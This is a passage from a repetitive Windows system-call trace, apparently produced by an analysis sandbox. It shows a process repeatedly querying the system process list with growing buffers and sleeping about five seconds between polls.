BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.701] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.717] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.724] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.740] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.747] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.755] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.775] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.782] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.789] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.797] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.804] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.811] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.819] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.826] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.834] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.840] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.855] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 